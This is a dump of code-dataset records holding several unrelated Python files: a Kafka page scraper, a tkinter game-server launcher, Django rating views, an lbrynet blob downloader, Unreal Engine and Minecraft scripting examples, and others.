matrix_Y\n\n\nif __name__ == '__main__':\n\n myData = Data('../ml-1m/ratings.dat')\n myData.split(0.8)\n X, Y, _, _ = myData.get_batch_train(512, 20)\n myData.shuffle_train()\n myData.renew_train()\n X, Y, _, _ = myData.get_batch_train(512, 20)\n\n\n\n\n\n","sub_path":"old_implement/Data_lstm.py","file_name":"Data_lstm.py","file_ext":"py","file_size_in_byte":4759,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"121957513","text":"import logging\nimport time\nfrom datetime import datetime\nfrom json import dumps\nfrom os import environ\nfrom urllib.error import URLError\nfrom urllib.request import urlretrieve\n\nfrom kafka import 
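# Editor's note: Data_lstm above packs a (movie, rating) pair into one integer
# id as (rating - 1) * number_of_movies + movie_index. A tiny round-trip
# sketch of that encoding; decode() is added here for illustration only and
# the ml-1m catalogue size is assumed.
def rating_id(movie_index, rating, n_movies):
    return (rating - 1) * n_movies + movie_index

def decode(rid, n_movies):
    return rid % n_movies, rid // n_movies + 1   # -> (movie_index, rating)

n_movies = 3706                                  # ml-1m movie count, assumed
rid = rating_id(42, 5, n_movies)
assert rid == 4 * 3706 + 42
assert decode(rid, n_movies) == (42, 5)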
KafkaProducer\n\nfrom util.page_config import PageConfig\n\nenv_name_bootstrap_server = \"BOOTSTRAP_SERVERS\"\nenv_name_interval = \"RETRIEVE_INTERVAL\"\n\ndefault_retrieve_interval = 60\n\ndef get_page(url):\n \"\"\"\n Retrieve a webpage from a URL and return its contents\n :param url: URL\n :return:\n \"\"\"\n tmp_file, _ = urlretrieve(url)\n with open(tmp_file) as f:\n return f.read()\n\n\ndef get_retrieve_interval() -> int:\n interval = environ.get(env_name_interval)\n retrieve_interval = default_retrieve_interval\n if not interval:\n logging.info(f\"{env_name_interval} not set, using {default_retrieve_interval} seconds\")\n else:\n retrieve_interval = int(interval)\n logging.info(f\"{env_name_interval} set, using {retrieve_interval} seconds\")\n return retrieve_interval\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO)\n boostrap_server = environ.get(env_name_bootstrap_server)\n if not boostrap_server:\n raise EnvironmentError(f\"Set {env_name_bootstrap_server} in environment\")\n\n retrieve_interval = get_retrieve_interval()\n p = PageConfig.from_file(\"page_config.json\")\n logging.info(f\"Getting pages from {p.url} ...\")\n producer = KafkaProducer(bootstrap_servers=boostrap_server)\n # value_serializer=lambda rec: dumps(rec.to_json()).encode('utf-8')\n while True:\n try:\n page_data = get_page(p.url)\n r = producer.send(p.topic, page_data.encode(\"utf-8\"))\n with open(f\"pages/{datetime.now().timestamp()}.html\", 'w') as f:\n f.write(page_data)\n while not r.is_done:\n time.sleep(0.1)\n logging.info(f\"Wrote page with offset {r.value.offset} and timestamp {r.value.timestamp}\")\n except URLError:\n logging.warning(f\"Could not fetch page from URL {p.url} .. retrying in {retrieve_interval} seconds\")\n time.sleep(retrieve_interval)\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"609467362","text":"import sys, os, configparser\nimport tkinter as tk\nimport tkinter.ttk as ttk\nfrom GameHandler import GameHandler\nfrom RegistryHandler import RegistryHandler\n\nclass MainApplication(ttk.Frame):\n\n bfdir = None\n bfapp = '\\\\BF1942.exe'\n ip = None\n\n mod = None\n\n # initializes the app\n def __init__(self, root):\n # handle configuration\n self.bfdir = RegistryHandler.getGameLocation()\n try:\n config = configparser.ConfigParser()\n cf = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'config.ini')\n config.readfp(open(cf))\n self.ip = config.get('config', 'ip')\n self.bfdir = config.get('config', 'bfdir')\n except FileNotFoundError:\n print('Couldn\\'t read config file.', file=sys.stderr)\n except configparser.NoOptionError:\n print('Couldn\\'t read an option.')\n\n # initialize GUI\n ttk.Frame.__init__(self, root)\n root.title('Server Status')\n root.resizable(0,0)\n\n # center the window\n w = root.winfo_screenwidth()\n h = root.winfo_screenheight()\n x = (root.winfo_screenwidth() - root.winfo_reqwidth()) / 2\n y = (root.winfo_screenheight() - root.winfo_reqheight()) / 2\n root.geometry(\"+%d+%d\" % ((x, y)))\n\n self.pack(padx=4, pady=4)\n self.createWidgets()\n self.refreshStatus()\n return\n\n def createWidgets(self):\n # force width of message area due to Tk wierdness\n mw = 240\n if self.bfdir == None:\n mw = 160\n self.status = tk.Message(self, text='Refreshing...', anchor='w', width=mw)\n\n self.join = ttk.Button(self, text=\"Join\", command=self.joinGame)\n self.refresh = ttk.Button(self, 
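# Editor's note: a minimal kafka-python send-and-confirm sketch matching the
# producer loop above; the broker address and topic name are placeholders.
# Calling get() on the returned future blocks until the broker acknowledges,
# which avoids the busy sleep-poll on r.is_done used in main.py.
from kafka import KafkaProducer

producer = KafkaProducer(bootstrap_servers="localhost:9092")
future = producer.send("pages", b"<html>...</html>")
metadata = future.get(timeout=10)        # raises on failure, returns on ack
print(metadata.offset, metadata.timestamp)
producer.flush()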
text=\"Refresh\", command=self.refreshStatus)\n self.quit = ttk.Button(self, text=\"Quit\", command=root.destroy)\n\n cr = 0\n self.status.grid(row=cr, column=0, columnspan=3, sticky=tk.W, padx=2, pady=2)\n cr += 1\n\n if self.bfdir != None:\n self.join.grid(row=cr, column=0, sticky=tk.E, padx=2, pady=2)\n self.refresh.grid(row=cr, column=1, padx=2, pady=2)\n self.quit.grid(row=cr, column=2, sticky=tk.E, padx=2, pady=2)\n return\n\n def refreshStatus(self):\n status, mod = GameHandler.getStatus(self.ip)\n if status == None:\n status = 'Failed to retrieve status.'\n self.status.config(text=status)\n if mod != None:\n self.mod = mod\n\n def joinGame(self):\n if GameHandler.joinGame(self.ip, self.bfdir, self.bfapp, self.mod) == True:\n root.destroy()\n else:\n error = 'Couldn\\'t launch game.\\nTry setting the game location in config.ini.'\n self.status.config(text=error)\n\nif __name__ == \"__main__\":\n root = tk.Tk()\n MainApplication(root).pack(side=\"top\", fill=\"both\", expand=True)\n root.mainloop()","sub_path":"app.pyw","file_name":"app.pyw","file_ext":"pyw","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"487095007","text":"from django.shortcuts import render,redirect\nfrom django.http import HttpResponse,HttpResponseRedirect,Http404, JsonResponse\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import NewProjectForm, NewRatingForm, NewProfileForm\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom .models import Project,Profile,AwardsProfiles,AwardsProjects,Rating\nfrom .serializer import ProfileSerializer,ProjectSerializer\nfrom rest_framework import status\nfrom .permissions import IsAdminOrReadOnly\nimport datetime as dt\nfrom django.contrib.auth.models import User\n\ndef convert_dates(dates):\n # function that gets the weekday number for the date.\n day_number = dt.date.weekday(dates)\n\n days = ['Monday','Tuesday','Wednesday','thursday','Friday','Saturday','Sunday']\n '''\n Returns the actual day of the week\n '''\n day = days[day_number]\n return day\n\n\n@login_required(login_url='/accounts/login/')\ndef index(request):\n id = request.user.id\n projects = Project.objects.all().order_by('-pub_date')\n\n return render(request, 'index.html',{'projects':projects,'profile':profile})\n\n@login_required(login_url='/accounts/login/')\ndef myprojects(request):\n projects = Project.objects.all().order_by()\n return render(request,'myprojects.html', {'projects':projects})\n\n@login_required(login_url='/accounts/login/')\ndef project(request, id):\n ida = request.user.id\n project = Project.objects.get(pk=id)\n ratings = Rating.objects.filter(project=id)\n project = Project.objects.get(pk=id)\n\n return render(request, 'project.html',{'profile':profile,'project':project,'ratings':ratings})\n\n@login_required(login_url='/accounts/login/')\ndef new_projects(request):\n ida = request.user.id\n\n if request.method == 'POST':\n form = NewProjectForm(request.POST, request.FILES)\n if form.is_valid():\n project = form.save(commit=False)\n project.save()\n return redirect('index')\n\n else:\n form = NewProjectForm()\n\n return render(request, 'new_project.html',{'form':form,'profile':profile})\n \n@login_required(login_url='/accounts/login/')\ndef profile(request, id):\n ida = request.user.id\n profile = Profile.objects.get(user=ida)\n user = request.user\n myprofile = 
Profile.objects.get(pk=id)\n\n return render(request, 'profile.html',{'profile':profile,'projects':projects})\n\n@login_required(login_url='/accounts/login/')\ndef edit_profile(request):\n ida = request.user.id\n profile = Profile.objects.get(user=ida)\n \n if request.method == 'POST':\n instance = get_object_or_404(Profile, user=ida)\n form = NewProfileForm(request.POST, request.FILES,instance=instance)\n if form.is_valid():\n form.save()\n\n return redirect('profile', ida)\n\n else:\n form = NewProfileForm()\n\n return render(request, 'edit_profile.html',{'form':form,'profile':profile})\n\ndef search(request):\n\n if 'project' in request.GET and request.GET[\"project\"]:\n search_term = request.GET.get(\"project\")\n searched_projects = project.search_by_title(search_term)\n message = f\"{search_term}\"\n return render(request, 'search.html',{\"message\":message,\"projects\": searched_projects})\n\n else:\n message = \"You haven't searched for any term\"\n return render(request, 'search.html',{\"message\":message})\n\nclass ProfileList(APIView):\n def get(self, request, format=None):\n all_profile = AwardsProfiles.objects.all()\n serializers = ProfileSerializer(all_profile, many=True)\n return Response(serializers.data)\n\n def post(self, request, format=None):\n serializers = ProfileSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data, status=status.HTTP_201_CREATED)\n return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)\n permission_classes = (IsAdminOrReadOnly,)\nclass ProjectList(APIView):\n def get(self, request, format=None):\n all_project = AwardsProjects.objects.all()\n serializers = ProjectSerializer(all_project, many=True)\n return Response(serializers.data)\n\n def post(self, request, format=None):\n serializers = ProjectSerializer(data=request.data)\n if serializers.is_valid():\n serializers.save()\n return Response(serializers.data, status=status.HTTP_201_CREATED)\n return Response(serializers.errors, status=status.HTTP_400_BAD_REQUEST)\n permission_classes = (IsAdminOrReadOnly,)\nclass ProfileDescription(APIView):\n permission_classes = (IsAdminOrReadOnly,)\n def get_profile(self, pk):\n try:\n return ProfileList.objects.get(pk=pk)\n except ProfileList.DoesNotExist:\n return Http404\n\n def get(self, request, pk, format=None):\n merch = self.get_profile(pk)\n serializers = ProfileSerializer(merch)\n return Response(serializers.data)\n\nclass ProjectDescription(APIView):\n permission_classes = (IsAdminOrReadOnly,)\n def get_project(self, pk):\n try:\n return ProjectList.objects.get(pk=pk)\n except ProjectList.DoesNotExist:\n return Http404\n\n def get(self, request, pk, format=None):\n merch = self.get_project(pk)\n serializers = ProjectSerializer(merch)\n return Response(serializers.data)\n@login_required(login_url='/accounts/login/')\ndef newrating(request,id):\n ida = request.user.id\n idd = id\n current_username = request.user.username\n\n if request.method == 'POST':\n form = NewRatingForm(request.POST)\n if form.is_valid():\n rating = form.save(commit=False)\n design_rating = form.cleaned_data['design']\n usability_rating = form.cleaned_data['usability']\n content_rating = form.cleaned_data['content']\n rating.postername = current_username\n rating.project = Project.objects.get(pk=id)\n\n rating.save()\n return redirect('project',id)\n\n else:\n form = NewRatingForm()\n\n return render(request, 
'newrating.html',{'form':form,'profile':profile,'idd':idd})","sub_path":"award/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"369471767","text":"#!/usr/bin/env python\n\nimport asyncio, datetime, websockets\nfrom token_manager import TokenManager\n\nmanager = TokenManager()\nasync def time(websocket, path):\n global manager\n while True:\n # now = datetime.datetime.utcnow().isoformat() + 'Z'\n # await websocket.send(json.dumps({\"now\": now}))\n\n request = await websocket.recv()\n broadcast = manager.process_request(request)\n if broadcast:\n message = manager.envelop_message()\n await websocket.send(message)\n\n\nif __name__ == '__main__':\n start_server = websockets.serve(time, '128.163.154.220', 5678)\n\n asyncio.get_event_loop().run_until_complete(start_server)\n asyncio.get_event_loop().run_forever()\n","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"622889382","text":"import tensorflow as tf\nimport numpy as np\nimport pickle\nimport cv2\nimport sys\n\ndiff_model=tf.keras.models.load_model('diff_model.h5')\nencode_model=tf.keras.models.load_model('encode_model.h5')\n\n\ndata=pickle.load(open('one_shot_inputs.pickle','rb'))\ndata=np.asarray(data)\nlabel=np.array(data[:,1])\nimage_path=sys.argv[1]\n\ndef pre(img):\n\tinp=encode_model.predict(np.expand_dims(img,0))\n\tx=np.zeros((200,2048,))\n\ti=0\n\tfor y in data[:,0]:\n\t\tx[i,:]=np.sqrt(np.square(y-inp[0]))\n\t\ti=i+1\n\treturn x\n\ndef prediction(x):\n\ty=diff_model.predict(x)\n\ta=None\n\tn=np.argmax(y)\n\tif y[n]>0.7:\n\t\ta=label[n]\n\treturn a\n\ndef frames(frame):\n\timg=cv2.resize(frame,(299,299))\n\tx=pre(img)\n\ty=prediction(x)\n\timage = cv2.putText(frame, y, (50,50), cv2.FONT_HERSHEY_SIMPLEX, 2, (0,0,255), 2, cv2.LINE_AA)\n\treturn image\n\ncap = cv2.VideoCapture(image_path)\nret=True \nwhile(ret):\n ret, frame = cap.read()\n try:\n \timage = frames(frame)\n except:\n \tprint(\"Failed\")\n cv2.imshow('frame',image)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"one_shot.py","file_name":"one_shot.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312484134","text":"import asyncio\nimport typing\nimport logging\nfrom lbrynet import conf\nfrom lbrynet.utils import drain_tasks\nfrom lbrynet.blob_exchange.client import BlobExchangeClientProtocol, request_blob\nif typing.TYPE_CHECKING:\n from lbrynet.dht.node import Node\n from lbrynet.dht.peer import KademliaPeer\n from lbrynet.blob.blob_manager import BlobFileManager\n from lbrynet.blob.blob_file import BlobFile\n\nlog = logging.getLogger(__name__)\n\n\ndef drain_into(a: list, b: list):\n while a:\n b.append(a.pop())\n\n\nclass BlobDownloader: # TODO: refactor to be the base class used by StreamDownloader\n \"\"\"A single blob downloader\"\"\"\n def __init__(self, loop: asyncio.BaseEventLoop, blob_manager: 'BlobFileManager', config: conf.Config):\n self.loop = loop\n self.blob_manager = blob_manager\n self.new_peer_event = asyncio.Event(loop=self.loop)\n self.active_connections: typing.Dict['KademliaPeer', BlobExchangeClientProtocol] = {}\n self.running_download_requests: typing.List[asyncio.Task] = []\n self.requested_from: typing.Dict[str, 
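# Editor's note: one_shot.py above keeps only the best gallery match and
# rejects it below a confidence threshold. A numpy sketch of that
# accept-or-abstain rule; the 0.7 cut-off mirrors prediction(), while the
# scores and labels here are illustrative.
import numpy as np

def best_match(scores, labels, threshold=0.7):
    """Label of the highest score, or None if the model is not confident."""
    n = int(np.argmax(scores))
    return labels[n] if scores[n] > threshold else None

labels = ["alice", "bob", "carol"]
assert best_match(np.array([0.10, 0.85, 0.30]), labels) == "bob"
assert best_match(np.array([0.20, 0.40, 0.35]), labels) is None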
typing.Dict['KademliaPeer', asyncio.Task]] = {}\n self.lock = asyncio.Lock(loop=self.loop)\n self.blob: 'BlobFile' = None\n self.blob_queue = asyncio.Queue(loop=self.loop)\n\n self.blob_download_timeout = config.blob_download_timeout\n self.peer_connect_timeout = config.peer_connect_timeout\n self.max_connections = config.max_connections_per_download\n\n async def _request_blob(self, peer: 'KademliaPeer'):\n if self.blob.get_is_verified():\n log.info(\"already verified\")\n return\n if peer not in self.active_connections:\n log.warning(\"not active, adding: %s\", str(peer))\n self.active_connections[peer] = BlobExchangeClientProtocol(self.loop, self.blob_download_timeout)\n protocol = self.active_connections[peer]\n success, keep_connection = await request_blob(self.loop, self.blob, protocol, peer.address, peer.tcp_port,\n self.peer_connect_timeout)\n await protocol.close()\n if not keep_connection:\n log.info(\"drop peer %s:%i\", peer.address, peer.tcp_port)\n if peer in self.active_connections:\n async with self.lock:\n del self.active_connections[peer]\n return\n log.info(\"keep peer %s:%i\", peer.address, peer.tcp_port)\n\n def _update_requests(self):\n self.new_peer_event.clear()\n if self.blob.blob_hash not in self.requested_from:\n self.requested_from[self.blob.blob_hash] = {}\n to_add = []\n for peer in self.active_connections.keys():\n if peer not in self.requested_from[self.blob.blob_hash] and peer not in to_add:\n to_add.append(peer)\n if to_add or self.running_download_requests:\n log.info(\"adding download probes for %i peers to %i already active\",\n min(len(to_add), 8 - len(self.running_download_requests)),\n len(self.running_download_requests))\n else:\n log.info(\"downloader idle...\")\n for peer in to_add:\n if len(self.running_download_requests) >= 8:\n break\n task = self.loop.create_task(self._request_blob(peer))\n self.requested_from[self.blob.blob_hash][peer] = task\n self.running_download_requests.append(task)\n\n def _add_peer_protocols(self, peers: typing.List['KademliaPeer']):\n added = 0\n for peer in peers:\n if peer not in self.active_connections:\n self.active_connections[peer] = BlobExchangeClientProtocol(self.loop, self.blob_download_timeout)\n added += 1\n if added:\n if not self.new_peer_event.is_set():\n log.info(\"added %i new peers\", len(peers))\n self.new_peer_event.set()\n\n async def _accumulate_connections(self, node: 'Node'):\n try:\n async with node.stream_peer_search_junction(self.blob_queue) as search_junction:\n async for peers in search_junction:\n if not isinstance(peers, list): # TODO: what's up with this?\n log.error(\"not a list: %s %s\", peers, str(type(peers)))\n else:\n self._add_peer_protocols(peers)\n return\n except asyncio.CancelledError:\n pass\n\n async def get_blob(self, blob_hash: str, node: 'Node') -> 'BlobFile':\n self.blob = self.blob_manager.get_blob(blob_hash)\n if self.blob.get_is_verified():\n return self.blob\n accumulator = self.loop.create_task(self._accumulate_connections(node))\n self.blob_queue.put_nowait(blob_hash)\n try:\n while not self.blob.get_is_verified():\n if len(self.running_download_requests) < self.max_connections:\n self._update_requests()\n\n # drain the tasks into a temporary list\n download_tasks = []\n drain_into(self.running_download_requests, download_tasks)\n got_new_peer = self.loop.create_task(self.new_peer_event.wait())\n\n # wait for a new peer to be added or for a download attempt to finish\n await asyncio.wait([got_new_peer] + download_tasks, return_when='FIRST_COMPLETED',\n 
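# Editor's note: get_blob below races its download tasks against a "new peer"
# event with asyncio.wait(return_when=FIRST_COMPLETED). A stripped-down,
# runnable sketch of that pattern with stand-in coroutines, using the
# old-style event loop API to match the rest of this module:
import asyncio

async def race(loop):
    event = asyncio.Event()
    tasks = [loop.create_task(asyncio.sleep(0.01))]   # stand-in download task
    waiter = loop.create_task(event.wait())
    done, pending = await asyncio.wait(
        tasks + [waiter], return_when=asyncio.FIRST_COMPLETED)
    if not waiter.done():
        waiter.cancel()               # a task finished first: drop the waiter
    return len(done), len(pending)

loop = asyncio.get_event_loop()
print(loop.run_until_complete(race(loop)))            # -> (1, 1)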
loop=self.loop)\n if got_new_peer and not got_new_peer.done():\n got_new_peer.cancel()\n if self.blob.get_is_verified():\n if got_new_peer and not got_new_peer.done():\n got_new_peer.cancel()\n drain_tasks(download_tasks)\n return self.blob\n except asyncio.CancelledError:\n drain_tasks(self.running_download_requests)\n raise\n finally:\n if accumulator and not accumulator.done():\n accumulator.cancel()\n","sub_path":"lbrynet/blob_exchange/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":6043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"378912350","text":"import boto3\nimport botocore\nimport os\n\n\n\ns3conn = None\ndataprovider_bucket = None\n\ndef set_conn():\n global s3conn\n s3conn = make_s3_resource()\n\n\ndef make_s3_resource():\n s3 = boto3.resource('s3',\n aws_access_key_id=os.getenv('S3_BLOG_UPLOAD_ACCESS_KEY'),\n aws_secret_access_key=os.getenv('S3_BLOG_UPLOAD_SECRET'),\n region_name=os.getenv('AWS_S3_REGION'))\n return s3\n\n\ndef write_s3_file(bucket_name, s3_filename, content):\n assert isinstance(content, basestring)\n try:\n s3conn.Object(bucket_name, s3_filename).put(\n Body=content)\n return True\n except botocore.exceptions.ClientError as e:\n return False\n\n\ndef read_s3_file(bucket_name, s3_filename):\n try:\n return s3conn.Object(bucket_name, s3_filename).get()[\"Body\"].read()\n except botocore.exceptions.ClientError as e:\n return\n\n","sub_path":"s3util.py","file_name":"s3util.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"133986225","text":"import unreal_engine as ue\nfrom unreal_engine import FVector, FRotator\nfrom unreal_engine.classes import Character, PawnSensingComponent, Pawn, TriggerBox, Actor\n\nue.log('Hello, I am a Python module')\n\n\nclass Hero:\n def begin_play(self):\n obj = self.uobject\n ue.log(\"Hero:begin_play\")\n\n prop_list = self.uobject.properties()\n for prop in prop_list:\n prop_value = obj.get_property(prop)\n ue.log('property ' + prop + ': ' + str(prop_value))\n\n world = self.uobject.get_world()\n ue.log('world ' + str(world))\n\n full_name = self.uobject.get_full_name()\n ue.log('Hero full name ' + full_name)\n\n # all_objects = self.uobject.all_objects()\n # ue.log('all objects:')\n # for obj in all_objects:\n # print(obj.get_name())\n\n # sphere_actor = self.uobject.find_object('Sphere')\n # ue.log('sphere actor ' + cube_actor)\n\n # all_actors = self.uobject.all_actors()\n # for actor in all_actors:\n # print(actor.get_name())\n\n hero_class = self.uobject.get_class()\n ue.log('Hero class ' + str(hero_class))\n\n mesh_actor = self.uobject.actor_spawn(ue.find_class('StaticMeshActor'), self.uobject.get_actor_location() + FVector(0, 0, 200), self.uobject.get_actor_rotation())\n ue.log('mesh actor ' + mesh_actor.get_name())\n mesh_comp = mesh_actor.StaticMeshComponent\n mesh_comp.call('SetStaticMesh /Engine/EngineMeshes/Sphere.Sphere')\n self.mesh_actor = mesh_actor\n self.elapsed_time = 0\n\n # static_mesh_comp_class = ue.find_class('StaticMeshComponent')\n # has_mesh_comp = self.uobject.actor_has_component_of_type(ue.find_class('StaticMeshComponent'))\n # ue.log('has mesh comp: ' + str(has_mesh_comp))\n\n # static_mesh_comp = obj.get_actor_component_by_type(static_mesh_comp_class)\n # static_mesh_comp = obj.get_component_by_type(static_mesh_comp_class)\n # ue.log('static mesh comp: ' + str(static_mesh_comp))\n #\n # all_comps = 
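# Editor's note: a minimal boto3 round trip matching s3util above (put a small
# object, read it back). The bucket and key are placeholders, and credentials
# are assumed to come from the environment or ~/.aws, as boto3 normally
# resolves them.
import boto3

s3 = boto3.resource("s3")
obj = s3.Object("my-bucket", "notes/hello.txt")
obj.put(Body=b"hello")
assert obj.get()["Body"].read() == b"hello"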
obj.get_actor_components()\n # ue.log('all components')\n # for comp in all_comps:\n # ue.log(str(comp))\n\n obj.bind_key('K', ue.IE_PRESSED, self.k_pressed)\n obj.bind_key('Q', ue.IE_PRESSED, self.q_pressed)\n # self.uobject.bind_axis('MoveForward', self.move_forward)\n obj.enable_input()\n # obj.show_mouse_cursor()\n # obj.enable_click_events()\n # obj.enable_mouse_over_events()\n\n if obj.actor_has_tag('Test'):\n ue.log('Hero has tag Test')\n\n location, extents = obj.get_actor_bounds()\n ue.log('Hero location: ' + str(location) + ' extents: ' + str(extents))\n\n # hit = obj.line_trace_single_by_channel(location + FVector(0, 500, 0), location + FVector(0, -500, 0), 0)\n # ue.log('hit: ' + str(hit))\n\n hits = obj.line_trace_multi_by_channel(location + FVector(0, 500, 0), location + FVector(0, -500, 0), 0)\n for hit in hits:\n ue.log('hit: ' + str(hit))\n\n static_mesh_comp_class = ue.find_class('StaticMeshComponent')\n static_mesh_comp = obj.add_actor_component(static_mesh_comp_class, 'MeshComp')\n ue.log('static mesh comp: ' + str(static_mesh_comp))\n\n root_mesh_comp = obj.add_actor_root_component(static_mesh_comp_class, 'RootMeshComp')\n ue.log('root mesh comp: ' + str(root_mesh_comp))\n\n def tick(self, delta_time):\n obj = self.uobject\n location = self.uobject.get_actor_location()\n location.z += 100 * delta_time\n self.uobject.set_actor_location(location)\n # self.uobject.set_actor_location(100, 100, 100)\n # ue.log('Hero location ' + location)\n\n self.uobject.set_actor_rotation(0, 90, 0)\n rotation = self.uobject.get_actor_rotation()\n # ue.log('Hero rotation ' + rotation)\n\n forward = self.uobject.get_actor_forward()\n # ue.log('Hero forward ' + forward)\n\n right = self.uobject.get_actor_right()\n # ue.log('Hero right ' + right)\n\n up = self.uobject.get_actor_up()\n # ue.log('Hero up ' + up)\n\n velocity = self.uobject.get_actor_velocity()\n # ue.log('Hero velocity ' + velocity)\n\n prop_role = self.uobject.get_property('Role')\n # ue.log('Hero Role ' + str(prop_role))\n\n if obj.is_input_key_down('O'):\n ue.log('O pressed')\n mouse_hit = obj.get_hit_result_under_cursor(0)\n ue.log('mouse hit: ' + str(mouse_hit))\n #\n # forward_value = obj.get_input_axis('MoveForward')\n # if forward_value > 0:\n # ue.log('forward value: ' + str(forward_value))\n\n def k_pressed(self):\n self.mesh_actor.actor_destroy()\n\n def q_pressed(self):\n self.uobject.quit_game()\n\n def move_forward(self, amount):\n location = self.uobject.get_actor_location()\n location.x += 100 * amount\n self.uobject.set_actor_location(location)\n\n\nclass Ball:\n def begin_play(self):\n self.uobject.bind_event('OnActorBeginOverlap', self.manage_overlap)\n self.uobject.bind_action('Jump', ue.IE_PRESSED, self.uobject.jump)\n self.uobject.bink_key('K', ue.IE_PRESSED, self.you_pressed_K)\n self.uobject.bind_axis('MoveForward', self.move_forward)\n\n def manage_overlap(self, me, other):\n ue.print_string('overlapping ' + other.get_name())\n\n def you_pressed_K(self):\n ue.log_warning('you pressed K')\n\n def move_forward(self, amount):\n ur.print_string(\"axis value: \" + str(amount))\n\n\nclass DestroyWhenOverlap:\n def begin_play(self):\n ue.print_string('Hello')\n\n def on_actor_begin_overlap(self, me, other_actor):\n ue.print_string('Collided with ' + other_actor.get_name())\n self.uobject.actor_destroy()\n\n\nclass CreatePyActor:\n def begin_play(self):\n new_actor = self.uobject.actor_spawn(ue.find_class('PyActor'), FVector(0, 0, 0), FRotator(0, 0, 90))\n static_mesh = 
new_actor.add_actor_root_component(ue.find_class('StaticMeshComponent'), 'SphereMesh')\n static_mesh.call('SetStaticMesh /Engine/EngineMeshes/Sphere.Sphere')\n new_actor.set_property('PythonModule', 'gameclasses')\n new_actor.set_property('PythonClass', 'Vertical')\n\n # monster = self.uobject.actor_spawn(Monster, self.uobject.get_actor_location(), self.uobject.get_actor_rotation())\n # ue.log('monster name ' + monster.get_name())\n\n\nclass Player:\n def begin_play(self):\n self.pawn = self.uobject.get_owner()\n\n self.base_turn_rate = 45.0\n self.base_look_up_rate = 45.0\n\n self.pawn.bind_axis('TurnRate', self.turn)\n self.pawn.bind_axis('LookUpRate', self.look_up)\n self.pawn.bind_axis('Turn', self.pawn.add_controller_yaw_input)\n self.pawn.bind_axis('LookUp', self.pawn.add_controller_pitch_input)\n\n self.pawn.bind_axis('MoveForward', self.move_forward)\n self.pawn.bind_axis('MoveRight', self.move_right)\n\n self.pawn.bind_action('Jump', ue.IE_PRESSED, self.pawn.jump)\n self.pawn.bind_action('Jump', ue.IE_PRESSED, self.pawn.stop_jumping)\n\n def turn(self, axis_value):\n turn_rate = axis_value * self.base_turn_rate * self.uobject.get_world_delta_seconds()\n self.pawn.add_controller_yaw_input(turn_rate)\n\n def look_up(self, axis_value):\n look_up_rate = axis_value * self.base_look_up_rate * self.uobject.get_world_delta_seconds()\n self.pawn.add_controller_pitch_input(look_up_rate)\n\n def move_forward(self, axis_value):\n rot = self.pawn.get_control_rotation()\n fwd = ue.get_forward_vector(0, 0, rot[2])\n self.pawn.add_movement_input(fwd, axis_value)\n\n def move_right(self, axis_value):\n rot = self.pawn.get_control_rotation()\n right = ue.get_right_vector(0, 0, rot[2])\n self.pawn.add_movement_input(right, axis_value)\n\n\nclass Monster(Character):\n # def __init__(self):\n # self.sensor = self.add_actor_component(PawnSensingComponent, 'Sensor')\n\n def begin_play(self):\n ue.log(\"Monster:begin_play\")\n\n def tick(self, delta_time):\n location = self.uobject.get_actor_location()\n location.z += 100 * delta_time\n self.uobject.set_actor_location(location)\n ue.log('Monster location' + location)\n\n def ReceiveBeginPlay(self):\n self.sensor.SightRadius = 200\n\n def OnSeePawn(self, pawn: Pawn):\n ue.print_string('seen {}'.format(pawn))\n\n\nclass ExplodeTrigger(TriggerBox):\n def ReceiveActorBeginOverlap(self, other: Actor):\n ue.log(\"Triggered by\" + str(other))\n","sub_path":"AndroidProject/Content/Scripts/PythonTest.py","file_name":"PythonTest.py","file_ext":"py","file_size_in_byte":8621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"351558158","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 25 14:32:04 2021\n\n@author: USER\n\"\"\"\nfrom mcpi.minecraft import Minecraft as mc\nimport time\nmcs=mc.create()\nx,y,z=mcs.player.getTilePos()\ni =0\nwhile i < 5:\n mcs.player.setTilePos(x,y,z)\n time.sleep(2.5)\n y=y-10\n i=i+1","sub_path":"day1/class1_6py-day11.py","file_name":"class1_6py-day11.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"492102822","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 5 20:40:34 2018\r\n\r\n@author: User\r\n\"\"\"\r\n\r\nimport xlrd\r\nfrom sklearn import linear_model\r\nimport numpy as np\r\nimport pandas as pd\r\n\r\nworkbook = xlrd.open_workbook('Income Statement.xls')\r\nbooksheet = workbook.sheet_by_index(1)\r\ncompany = booksheet.col_values(1)\r\ncompany1 = 
